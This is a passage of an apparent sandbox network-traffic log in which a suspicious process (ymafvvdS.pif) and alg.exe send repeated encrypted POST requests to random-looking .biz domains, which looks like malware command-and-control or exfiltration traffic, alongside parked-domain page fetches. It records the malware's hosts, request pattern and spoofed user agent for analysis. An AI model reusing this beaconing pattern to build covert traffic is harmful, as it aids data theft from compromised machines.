                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127461910 CET1236INData Raw: 27 63 6f 6c 6f 72 53 65 61 72 63 68 42 75 74 74 6f 6e 27 3a 20 27 23 30 62 33 32 37 39 27 2c 0a 20 20 20 20 20 20 20 20 27 63 6f 6c 6f 72 53 65 61 72 63 68 42 75 74 74 6f 6e 54 65 78 74 27 3a 20 27 23 66 66 66 27 0a 20 20 20 20 7d 3b 0a 20 20 20
                                                                                                                                                                                                                        Data Ascii: 'colorSearchButton': '#0b3279', 'colorSearchButtonText': '#fff' }; </script><script type="text/javascript">let isAdult=false; let containerNames=[]; let uniqueTrackingID='MTczMzgxMDc1My44NDg6YTcwZWU0OWQ2ZWYzYWF
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127477884 CET1236INData Raw: 73 65 3b 6c 65 74 20 70 61 67 65 4f 70 74 69 6f 6e 73 20 3d 20 7b 27 70 75 62 49 64 27 3a 20 27 64 70 2d 74 65 61 6d 69 6e 74 65 72 6e 65 74 30 31 27 2c 27 72 65 73 75 6c 74 73 50 61 67 65 42 61 73 65 55 72 6c 27 3a 20 27 2f 2f 27 20 2b 20 6c 6f
                                                                                                                                                                                                                        Data Ascii: se;let pageOptions = {'pubId': 'dp-teaminternet01','resultsPageBaseUrl': '//' + location.host + '/?ts=','fontFamily': 'arial','optimizeTerms': true,'maxTermLength': 40,'adtest': true,'clicktrackUrl': '//' + location.host + '/track.php?','attri
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127651930 CET1236INData Raw: 6d 61 69 6e 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 6d 61 69 6e 29 20 2b 20 22 26 63 61 66 3d 31 26 74 6f 67 67 6c 65 3d 62 6c 6f 63 6b 26 72 65 61 73 6f 6e 3d 6f 74 68 65 72 26 75 69 64 3d 22 20 2b 20 65 6e
                                                                                                                                                                                                                        Data Ascii: main=" + encodeURIComponent(domain) + "&caf=1&toggle=block&reason=other&uid=" + encodeURIComponent(uniqueTrackingID));}if (status.errorcode && !status.error_code) {status.error_code = status.errorcode;}if (status.error_code) {ajaxQuery(scriptP
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.127664089 CET1236INData Raw: 61 78 51 75 65 72 79 28 73 63 72 69 70 74 50 61 74 68 20 2b 20 22 2f 74 72 61 63 6b 2e 70 68 70 3f 64 6f 6d 61 69 6e 3d 22 20 2b 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 6d 61 69 6e 29 20 2b 20 22 26 63 61 66 3d 31 26 74
                                                                                                                                                                                                                        Data Ascii: axQuery(scriptPath + "/track.php?domain=" + encodeURIComponent(domain) + "&caf=1&toggle=adult&uid=" + encodeURIComponent(uniqueTrackingID));} else if ((status.adult === false || status.adult == "false") && isAdult) {ajaxQuery(scriptPath + "/tr
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.246736050 CET1236INData Raw: 20 28 6c 65 74 20 6b 65 79 20 69 6e 20 6f 62 6a 32 29 6f 62 6a 31 5b 6b 65 79 5d 20 3d 20 6f 62 6a 32 5b 6b 65 79 5d 3b 72 65 74 75 72 6e 20 6f 62 6a 31 3b 7d 3b 66 75 6e 63 74 69 6f 6e 20 67 65 74 58 4d 4c 68 74 74 70 28 29 20 7b 6c 65 74 20 78
                                                                                                                                                                                                                        Data Ascii: (let key in obj2)obj1[key] = obj2[key];return obj1;};function getXMLhttp() {let xmlHttp = null;try {xmlHttp = new XMLHttpRequest();} catch (e) {try {xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");} catch (ex) {try {xmlHttp = new ActiveXObject(
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.457324028 CET357OUTGET /fauopp?usid=18&utid=28672494417 HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Host: ww12.przvgke.biz
                                                                                                                                                                                                                        Dec 10, 2024 07:05:55.960787058 CET825INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Accept-Ch: viewport-width
                                                                                                                                                                                                                        Accept-Ch: dpr
                                                                                                                                                                                                                        Accept-Ch: device-memory
                                                                                                                                                                                                                        Accept-Ch: rtt
                                                                                                                                                                                                                        Accept-Ch: downlink
                                                                                                                                                                                                                        Accept-Ch: ect
                                                                                                                                                                                                                        Accept-Ch: ua
                                                                                                                                                                                                                        Accept-Ch: ua-full-version
                                                                                                                                                                                                                        Accept-Ch: ua-platform
                                                                                                                                                                                                                        Accept-Ch: ua-platform-version
                                                                                                                                                                                                                        Accept-Ch: ua-arch
                                                                                                                                                                                                                        Accept-Ch: ua-model
                                                                                                                                                                                                                        Accept-Ch: ua-mobile
                                                                                                                                                                                                                        Accept-Ch-Lifetime: 30
                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:55 GMT
                                                                                                                                                                                                                        Server: Caddy
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_T6cLo7zYd6VxkyX5D7YTlF7rCMU5iTRTcMcDAcWhkhzoMxAI52XbayhHdJP3m8mgaS9l0VK8c7G1Pzo5Wv8NpQ==
                                                                                                                                                                                                                        X-Domain: przvgke.biz
                                                                                                                                                                                                                        X-Pcrew-Blocked-Reason:
                                                                                                                                                                                                                        X-Pcrew-Ip-Organization: CenturyLink
                                                                                                                                                                                                                        X-Subdomain: ww12
                                                                                                                                                                                                                        Transfer-Encoding: chunked


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        16192.168.2.949730199.59.243.227807996C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:05:52.882267952 CET356OUTGET /cairvr?usid=18&utid=28672493914 HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Host: ww7.przvgke.biz
                                                                                                                                                                                                                        Dec 10, 2024 07:05:53.979266882 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                        date: Tue, 10 Dec 2024 06:05:53 GMT
                                                                                                                                                                                                                        content-type: text/html; charset=utf-8
                                                                                                                                                                                                                        content-length: 1138
                                                                                                                                                                                                                        x-request-id: bc0b2f68-753d-4be3-be81-809885932c05
                                                                                                                                                                                                                        cache-control: no-store, max-age=0
                                                                                                                                                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MjlSp8QbG/3KFaHTkUJ2cd3nvIhuMLWt+Sn0wvyxUwU8mTozxi/rDVYF4zRohC/QtaPyf+sdCnKSpjTi9+qGbg==
                                                                                                                                                                                                                        set-cookie: parking_session=bc0b2f68-753d-4be3-be81-809885932c05; expires=Tue, 10 Dec 2024 06:20:53 GMT; path=/
                                                                                                                                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4d 6a 6c 53 70 38 51 62 47 2f 33 4b 46 61 48 54 6b 55 4a 32 63 64 33 6e 76 49 68 75 4d 4c 57 74 2b 53 6e 30 77 76 79 78 55 77 55 38 6d 54 6f 7a 78 69 2f 72 44 56 59 46 34 7a 52 6f 68 43 2f 51 74 61 50 79 66 2b 73 64 43 6e 4b 53 70 6a 54 69 39 2b 71 47 62 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                        Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_MjlSp8QbG/3KFaHTkUJ2cd3nvIhuMLWt+Sn0wvyxUwU8mTozxi/rDVYF4zRohC/QtaPyf+sdCnKSpjTi9+qGbg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
                                                                                                                                                                                                                        Dec 10, 2024 07:05:53.979295015 CET572INData Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65
                                                                                                                                                                                                                        Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYmMwYjJmNjgtNzUzZC00YmUzLWJlODEtODA5ODg1OTMyYzA1IiwicGFnZV90aW1lIjoxNzMzODEwNzUzLCJwYWdlX3VybCI6I


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        17192.168.2.94973118.141.10.107807996C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.839410067 CET353OUTPOST /uoxisrajk HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Host: knjghuig.biz
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                        Dec 10, 2024 07:05:54.839492083 CET802OUTData Raw: 08 d8 ae 8d 3a 02 30 47 16 03 00 00 f9 0f 81 53 02 e7 64 8f cf b4 17 47 b3 c3 d6 ca c7 a0 69 4f 9b 86 9b 53 65 f8 3d 39 ff fd 43 87 42 14 ed ac 68 f6 6c 0d bb c4 1a 1f 1b b1 9e 46 a8 dd 0b a3 f4 ab 97 90 18 29 1a 00 92 0e 55 35 3b 8a 85 04 4a 79
                                                                                                                                                                                                                        Data Ascii: :0GSdGiOSe=9CBhlF)U5;Jy8P/F*9ma,Ib,jO&h)8h>L$'E!8u3%?kG(cr{TTF;ckPvcH@:S|s_g_BjQ$f( 7+xWJfw
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.864387035 CET412INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:56 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=463b86ae87d60229307798bd36f88c72|8.46.123.228|1733810756|1733810756|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        18192.168.2.94973218.141.10.107807276C:\Windows\System32\alg.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.508774042 CET353OUTPOST /jedofahyn HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Host: knjghuig.biz
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                        Dec 10, 2024 07:05:56.508833885 CET778OUTData Raw: 49 5b 36 23 d3 89 82 f7 fe 02 00 00 1f 97 a1 a0 0c d3 42 4e 14 65 e8 84 8f 9a 85 c3 e2 db 96 22 ca 22 a8 b5 1e ef 7b f8 41 7d fb c5 45 05 f3 89 ed 6e d5 72 5d e5 60 bb 98 b1 ce 09 7b 2a 5e 37 64 8c d0 41 cf bc b3 1b 61 67 fb da dc 61 eb 61 a1 45
                                                                                                                                                                                                                        Data Ascii: I[6#BNe""{A}Enr]`{*^7dAagaaEDFFxF[U<'fmdI/b?&3-E.65v=j5Sh|>tn(Q$wu)0v8dmiz?vJ'{m
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.552304983 CET412INHTTP/1.1 200 OK
                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                        Date: Tue, 10 Dec 2024 06:05:58 GMT
                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                        Set-Cookie: btst=e1acb035a8db29c618f735807b3e4bad|8.46.123.228|1733810758|1733810758|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                        Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        19192.168.2.94973382.112.184.197807996C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.465235949 CET353OUTPOST /ahrvaxreoca HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                        Dec 10, 2024 07:05:58.465343952 CET802OUTData Raw: 7a bb a6 cb e0 89 82 a7 16 03 00 00 d7 d3 9b a8 69 f7 22 db d1 75 5f 4b 46 58 65 0a 35 f5 e9 2e 29 8b 48 2b cf 15 8e d3 7b 09 d2 3a 6c 15 31 0f 7d 9f e1 4c c0 f5 ca 65 0a 7a 2d ca 24 bf 4d 64 3e 67 10 82 f9 ac 01 a3 67 8b 60 ec 29 e6 2e 45 69 fd
                                                                                                                                                                                                                        Data Ascii: zi"u_KFXe5.)H+{:l1}Lez-$Md>gg`).Ei56)5o,F^N{"b{-hxT4=#j\hRGH]R=SMDG5R6,e3j\74Jpj3a^"PvTJ1)>L};,q


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        20192.168.2.94973482.112.184.197807276C:\Windows\System32\alg.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:05:59.216613054 CET353OUTPOST /tjgeolaydho HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                        Dec 10, 2024 07:05:59.216656923 CET778OUTData Raw: 0f d1 1a c3 aa 03 be 69 fe 02 00 00 bd 5c 0a 40 d7 2c 3c c8 89 9a 2a 98 92 c5 e4 d4 00 c5 fd b2 af 7b 5d 8b 72 67 2b 51 ae 7d 59 4c be 2f c5 1c 79 b0 1a 62 ff ea ad 43 41 cf d3 f7 f2 0a 26 4d 9d 1b 56 a2 84 57 b8 bb 79 d7 c0 6b e0 e0 06 30 84 eb
                                                                                                                                                                                                                        Data Ascii: i\@,<*{]rg+Q}YL/ybCA&MVWyk0WN}+aYe7,pU}7EU;AR)gHI#f36vHsi-ky^!OH_}]R~0K>c


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        21192.168.2.94973682.112.184.197807996C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:06:20.516671896 CET350OUTPOST /bwbcqohd HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                        Dec 10, 2024 07:06:20.516706944 CET802OUTData Raw: e7 09 5d a6 ad e4 90 05 16 03 00 00 9d ea bb da d1 db 32 de 2c bd a9 39 ed be 70 84 01 dd 84 5e bd ba 08 4c 78 28 e1 11 cc c2 d0 47 f7 2d e5 89 e5 7f 98 a9 ae a1 3b 47 6c ce 24 18 88 45 e0 9b e8 8b c9 97 5d df 87 85 b4 03 2a 8a b0 c8 74 52 7d df
                                                                                                                                                                                                                        Data Ascii: ]2,9p^Lx(G-;Gl$E]*tR}s:k?1K\ B<`+*8w1Lus0#wV0zlIKh]7RKs&WAhR+oQmDpTzZOB


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        22192.168.2.94973782.112.184.197807276C:\Windows\System32\alg.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:06:21.615621090 CET358OUTPOST /pfoxkxwneqnmhcsc HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Host: lpuegx.biz
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                        Dec 10, 2024 07:06:21.615957975 CET778OUTData Raw: e0 4a cc b2 ac e8 28 40 fe 02 00 00 a2 d7 ed 4c 1b 2c ff 05 52 da 52 3e 6b d3 ec 01 9f 4c 62 01 37 2a 63 c5 b2 92 1a f5 9e 93 d6 98 7a ba 5e 14 a2 6e 5b b1 56 d6 72 e9 22 fd 6d 75 16 7f 3e 3f 09 a5 a7 a8 d2 d3 a3 8c 53 23 52 38 56 b0 1b 98 90 47
                                                                                                                                                                                                                        Data Ascii: J(@L,RR>kLb7*cz^n[Vr"mu>?S#R8VGlMhW-1|l{%DD:Z,c(v(U.acY~|rF&TnkP^3Bku!Dh).$qz7R[1!H/bYTaN~5e(5u-


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        23192.168.2.94974182.112.184.197807996C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:06:44.091917992 CET358OUTPOST /goescaydbiatn HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                        Dec 10, 2024 07:06:44.091957092 CET802OUTData Raw: 7f da 05 be 1a df b0 cf 16 03 00 00 dd 56 00 fb 70 60 da 0e b8 a9 18 70 05 92 da ee b8 96 0b fb 5f 09 30 70 24 9d 84 86 d5 26 91 8f 6c 44 e5 9a 36 83 70 c4 76 ec e8 83 48 fb 22 16 a6 c5 36 5a 46 84 35 e8 95 34 4c 18 c1 c7 0e 61 ef df ca 46 c6 54
                                                                                                                                                                                                                        Data Ascii: Vp`p_0p$&lD6pvH"6ZF54LaFTjEVH<z]60BTq{'>jCJ>/%4*kFAVSD$_1E|%1@W,C@*F,IE[O0lk[Vg S;QP


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        24192.168.2.94974282.112.184.197807276C:\Windows\System32\alg.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:06:44.471502066 CET351OUTPOST /ewvwgr HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                        Dec 10, 2024 07:06:44.471527100 CET778OUTData Raw: da 70 eb 34 db 50 e0 d8 fe 02 00 00 27 66 57 f4 32 7e 18 d5 7c 0e c5 67 d0 ca 04 5b 04 d8 fd f9 10 9c 2d 9e cf 3f 27 74 a0 aa 8a 1d 73 05 ec 9d 66 5d d4 62 61 07 16 91 42 98 03 0b 5c b8 73 f7 3a 5a 79 e2 3f d7 3d 87 c0 2e a9 6a 8e 89 dd 56 5f ce
                                                                                                                                                                                                                        Data Ascii: p4P'fW2~|g[-?'tsf]baB\s:Zy?=.jV_|g6,5qrC;xf7Vl0n{l|oI0l78+TnBx5m!M4/$%j.[@.Sqe4'#KtO!G!ta:p5%Rsu|i


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        25192.168.2.94974382.112.184.197807996C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.178466082 CET358OUTPOST /ovwmjligotchf HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.178495884 CET802OUTData Raw: 1c 59 f7 4c 30 8a 61 5c 16 03 00 00 8a 8b 03 53 62 ef 8b f1 6c 27 95 e5 49 c2 bc 3b 99 bd 75 7d da dd a1 bf 7a 2d 35 bc 83 48 59 6f f8 75 28 17 98 47 c3 a9 8d 58 6e 3c f7 e7 ce de 9a a6 16 a8 d0 97 f0 4f c3 48 1f 96 25 30 8b 5c 1c eb 20 e2 8d 7c
                                                                                                                                                                                                                        Data Ascii: YL0a\Sbl'I;u}z-5HYou(GXn<OH%0\ |eH{LQ9w6\xypW[644l6B&I'_Q#iO]nf_5>D+g?w8


                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                        26192.168.2.94974482.112.184.197807276C:\Windows\System32\alg.exe
                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.578418016 CET350OUTPOST /eooel HTTP/1.1
                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                        Host: vjaxhpbji.biz
                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                        Dec 10, 2024 07:07:06.578449965 CET778OUTData Raw: e4 11 2a ef a4 ee 84 59 fe 02 00 00 25 c2 be 0a a2 16 f3 9f 64 67 bd 13 d3 9e 40 9d 80 09 e2 0a 45 f3 58 53 a3 ca a8 ef 01 f6 b3 99 d7 e4 07 7a a9 ff 4d dd f2 eb 67 84 dc e9 d8 3d d9 fd 3f a2 ba cb f7 ea 89 79 1f d3 f0 0b f3 c1 71 ca 5f 1d 70 8d
                                                                                                                                                                                                                        Data Ascii: *Y%dg@EXSzMg=?yq_p7C.y>(B$Vl1Pcs31$R[[+0(K|G.Z?|W?.'TF1ym"CFgq~r Wb3jhw0


                                                                                                                                                                                                                        HTTPS Proxied Packets

